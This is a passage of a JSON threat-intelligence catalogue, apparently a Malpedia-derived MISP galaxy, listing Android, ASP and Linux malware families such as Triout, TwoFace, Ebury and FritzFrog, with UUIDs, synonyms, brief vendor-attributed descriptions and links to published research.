"https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout" ], "synonyms": [], "type": [] }, "uuid": "bd9ce51c-53f9-411b-b46a-aba036c433b1", "value": "Triout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", "value": "Unidentified APK 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" ], "synonyms": [], "type": [] }, "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", "value": "Unidentified APK 002" }, { "description": "According to Check Point Research, this is a RAT that is disguised as a set of dating apps like \"GrixyApp\", \"ZatuApp\", \"Catch&See\", including dedicated websites to conceal their malicious purpose.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_004", "https://research.checkpoint.com/2020/hamas-android-malware-on-idf-soldiers-this-is-how-it-happened/" ], "synonyms": [], "type": [] }, "uuid": "55626b63-4b9a-468e-92ae-4b09b303d0ed", "value": "Unidentified APK 004" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005", "https://community.riskiq.com/article/6f60db72", "https://twitter.com/voodoodahl1/status/1267571622732578816", "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", "https://s.tencent.com/research/report/951.html", "https://blog.talosintelligence.com/2020/10/donot-firestarter.html" ], "synonyms": [], "type": [] }, "uuid": "084ebca7-91da-4d9c-8211-a18f358ac28b", "value": "Unidentified APK 005" }, { "description": "Related to the micropsia windows malware and also sometimes named micropsia.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vamp", "https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/" ], "synonyms": [ "android.micropsia" ], "type": [] }, "uuid": "1ad5b462-1b0d-4c2f-901d-ead6c9f227bc", "value": "vamp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" ], "synonyms": [], "type": [] }, "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", "value": "Viper RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/" ], "synonyms": [], "type": [] }, "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", "value": "WireX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" ], "synonyms": [], "type": [] }, "uuid": "994c7bb3-ba40-41bb-89b3-f05996924b10", "value": "WolfRAT" }, { "description": "According to Avira, this is a banking trojan targeting Japan.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba", "https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan" ], "synonyms": [], "type": [] }, "uuid": "40a5d526-ef9f-4ddf-a326-6f33dceeeebc", "value": "Wroba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" ], "synonyms": [], "type": [] }, "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", "https://securelist.com/roaming-mantis-part-v/96250/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" ], "synonyms": [], "type": [] }, "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", "value": "XLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy", "https://twitter.com/malwrhunterteam/status/1249768400806653952" ], "synonyms": [], "type": [] }, "uuid": "57600f52-b55f-49c7-9c0c-de10b2d23370", "value": "XploitSPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", "https://blog.lookout.com/xrat-mobile-threat" ], "synonyms": [], "type": [] }, "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth", "https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html" ], "synonyms": [], "type": [] }, "uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7", "value": "YellYouth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen", "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" ], "synonyms": [], "type": [] }, "uuid": "46d6d102-fc38-46f7-afdc-689cafe13de5", "value": "Zen" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", "https://securelist.com/whos-who-in-the-zoo/85394/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-juno", "https://securelist.com/whos-who-in-the-zoo/85394", "https://securelist.com/apt-trends-report-q2-2019/91897/" ], "synonyms": [], "type": [] }, "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", "value": "ZooPark" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", "https://securelist.com/ztorg-from-rooting-to-sms/78775/" ], "synonyms": [ "Qysly" ], "type": [] }, "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, { "description": "According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.\r\n\r\nThe secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://www.youtube.com/watch?v=GjquFKa4afU", "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf" ], "synonyms": [ "HighShell", "HyperShell", "Minion", "SEASHARPEE" ], "type": [] }, "uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba", "value": "TwoFace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", "value": "Unidentified ASP 001 (Webshell)" }, { "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor", "https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/" ], "synonyms": [], "type": [] }, "uuid": "cd2d7040-edc4-4985-b708-b206b08cc1fe", "value": "ACBackdoor (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://twitter.com/IntezerLabs/status/1326880812344676352" ], "synonyms": [], "type": [] }, "uuid": "5d04aac3-fdf5-4922-9976-3a5a75e96e1a", "value": "AgeLocker" }, { "description": "AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop", "https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html" ], "synonyms": [ "CloudBot" ], "type": [] }, "uuid": "e91fcb82-e788-44cb-be5d-73b9601b9533", "value": "AirDropBot" }, { "description": "Honeypot-aware variant of Mirai.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru", "https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/" ], "synonyms": [], "type": [] }, "uuid": "e288425b-40f0-441e-977f-5f1264ed61b6", "value": "Aisuru" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns", "https://www.netscout.com/blog/asert/dropping-anchor", "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" ], "synonyms": [], "type": [] }, "uuid": "b88dc3ec-d94c-4e6e-a846-5d07130df550", "value": "Anchor_DNS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel", "https://www.secureworks.com/research/threat-profiles/bronze-olive", "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" ], "synonyms": [ "Ghost RAT" ], "type": [] }, "uuid": "6cb47609-b03e-43d9-a4c7-8342f1011f3b", "value": "ANGRYREBEL" }, { "description": "Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.azazel", "https://github.com/chokepoint/azazel" ], "synonyms": [], "type": [] }, "uuid": "37374572-3346-4c00-abc9-9f6883c8866e", "value": "azazel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", "https://news.drweb.com/show/?c=5&i=10193&lng=en" ], "synonyms": [], "type": [] }, "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", "value": "Irc16" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/", "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/" ], "synonyms": [ "Gafgyt", "gayfgt", "lizkebab", "qbot", "torlus" ], "type": [] }, "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", "value": "Bashlite" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter", "https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/" ], "synonyms": [], "type": [] }, "uuid": "d8dd47a5-85fe-4f07-89dc-00301468d209", "value": "BCMPUPnP_Hunter" }, { "description": "A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor", "https://blog.netlab.360.com/bigviktor-dga-botnet/" ], "synonyms": [], "type": [] }, "uuid": "901ab128-2d23-41d7-a9e7-6a34e281804e", "value": "BigViktor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota", "https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/", "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" ], "synonyms": [], "type": [] }, "uuid": "a30aedcc-562e-437a-827c-55bc00cf3506", "value": "Blackrota" }, { "description": "This is a pentesting tool and according to the author, \"BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.\".\r\n\r\nIt has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb", "https://github.com/brompwnie/botb" ], "synonyms": [ "BOtB" ], "type": [] }, "uuid": "57c9ab70-7133-441a-af66-10c0e4eb898b", "value": "Break out the Box" }, { "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://blogs.cisco.com/security/linuxcdorked-faqs" ], "synonyms": [ "CDorked.A" ], "type": [] }, "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", "value": "CDorked" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief", "https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/" ], "synonyms": [], "type": [] }, "uuid": "27d06ac9-42c4-433a-b1d7-660710d9e8df", "value": "CDRThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei", "https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader" ], "synonyms": [], "type": [] }, "uuid": "baa0704b-50d8-48af-91e1-049f30f422cc", "value": "Cephei" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus", "https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/" ], "synonyms": [], "type": [] }, "uuid": "7a226df2-9599-4002-9a38-b044e16f76a9", "value": "Cetus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" ], "synonyms": [], "type": [] }, "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", "value": "Chapro" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" ], "synonyms": [ "Snoopy" ], "type": [] }, "uuid": "0b1c514d-f617-4380-a28c-a1ed305a7538", "value": "Cloud Snooper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona", "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/" ], "synonyms": [], "type": [] }, "uuid": "591b15c3-ab72-49ce-981a-e6e21e506e52", "value": "Corona DDOS Bot" }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", "https://github.com/pooler/cpuminer" ], "synonyms": [], "type": [] }, "uuid": "8196b6f6-386e-4499-b269-4e5c65f74141", "value": "Cpuminer (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r", "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html", "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/", "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html" ], "synonyms": [ "CriptTor" ], "type": [] }, "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", "value": "Cr1ptT0r" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", "https://www.sygnia.co/mata-framework", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" ], "synonyms": [], "type": [] }, "uuid": "2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b", "value": "Dacls (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus", "https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly" ], "synonyms": [], "type": [] }, "uuid": "dfba0c8f-9d06-448b-817e-6fffa1b22cb9", "value": "Dark Nexus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddoor", "https://github.com/rek7/ddoor" ], "synonyms": [], "type": [] }, "uuid": "07f48866-647c-46b0-a0d4-29c81ad488a8", "value": "ddoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki", "https://www.securecoding.com/blog/all-about-doki-malware/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" ], "synonyms": [], "type": [] }, "uuid": "a5446b35-8613-4121-ada4-c0b1d6f72851", "value": "Doki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy", "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf" ], "synonyms": [], "type": [] }, "uuid": "a41d8c89-8229-4936-96c2-4b194ebaf858", "value": "DoubleFantasy (ELF)" }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://security.web.cern.ch/security/advisories/windigo/windigo.shtml", "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" ], "synonyms": [], "type": [] }, "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", "value": "Ebury" }, { "description": "The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.\r\n\r\nWhen it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.\r\n\r\nhttps://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot", "https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada", "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/", "https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html", "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/" ], "synonyms": [], "type": [] }, "uuid": "040ac9c6-e3ab-4b51-88a9-5380101c74f8", "value": "Echobot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome", "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/" ], "synonyms": [], "type": [] }, "uuid": "149e693c-4b51-4143-9061-6a8698b0e7f5", "value": "EvilGnome" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel", "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://twitter.com/craiu/status/1361581668092493824", "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" ], "synonyms": [], "type": [] }, "uuid": "1e0540f3-bad3-403f-b8ed-ce40a276559e", "value": "Exaramel (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", "https://www.recordedfuture.com/chinese-cyberespionage-operations/" ], "synonyms": [], "type": [] }, "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html", "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html", "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/", "https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/" ], "synonyms": [], "type": [] }, "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", "value": "FBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.finfisher", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/" ], "synonyms": [], "type": [] }, "uuid": "44018d71-25fb-4959-b61e-d7af97c85131", "value": "FinFisher (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.floodor", "https://github.com/Thibault-69/Floodor" ], "synonyms": [], "type": [] }, "uuid": "ac30f2be-8153-4588-b29c-5e5863792930", "value": "floodor" }, { "description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine’s disk. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog", "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/", "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" ], "synonyms": [], "type": [] }, "uuid": "b43b7b4a-9cf4-4f98-b4d2-617a7d84bfa7", "value": "FritzFrog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gitpaste12", "https://blogs.juniper.net/en-us/threat-research/gitpaste-12" ], "synonyms": [], "type": [] }, "uuid": "ffd09324-b585-49c0-97e5-536d386f49a5", "value": "Gitpaste-12" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.godlua", "https://blog.netlab.360.com/an-analysis-of-godlua-backdoor-en/" ], "synonyms": [], "type": [] }, "uuid": "f3cb0a78-1608-44b1-9949-c6addf6c13ce", "value": "Godlua" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.gosh", "https://twitter.com/IntezerLabs/status/1291355808811409408" ], "synonyms": [], "type": [] }, "uuid": "931f57f9-1edd-47b8-bf80-ae7190434558", "value": "GOSH" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.greedyantd", "https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/" ], "synonyms": [], "type": [] }, "uuid": "6aee7daf-9f63-4a70-bfe5-9c95cbdcb1e3", "value": "GreedyAntd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.haiduc", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [], "type": [] }, "uuid": "dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a", "value": "Haiduc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", "https://par.nsf.gov/servlets/purl/10096257", "https://x86.re/blog/hajime-a-follow-up/", "http://blog.netlab.360.com/hajime-status-report-en/", "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", "https://github.com/Psychotropos/hajime_hashes" ], "synonyms": [], "type": [] }, "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", "value": "Hajime" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", "value": "Hakai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.handymannypot", "https://twitter.com/liuya0904/status/1171633662502350848" ], "synonyms": [], "type": [] }, "uuid": "0b323b91-ad57-4127-99d1-6a2485be70df", "value": "HandyMannyPot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hand_of_thief", "https://blog.avast.com/2013/08/27/linux-trojan-hand-of-thief-ungloved/", "https://web.archive.org/web/20130815040638/https://blogs.rsa.com/thieves-reaching-for-linux-hand-of-thief-trojan-targets-linux-inth3wild/" ], "synonyms": [ "Hanthie" ], "type": [] }, "uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d", "value": "Hand of Thief" }, { "description": "", "meta": { "refs": [ 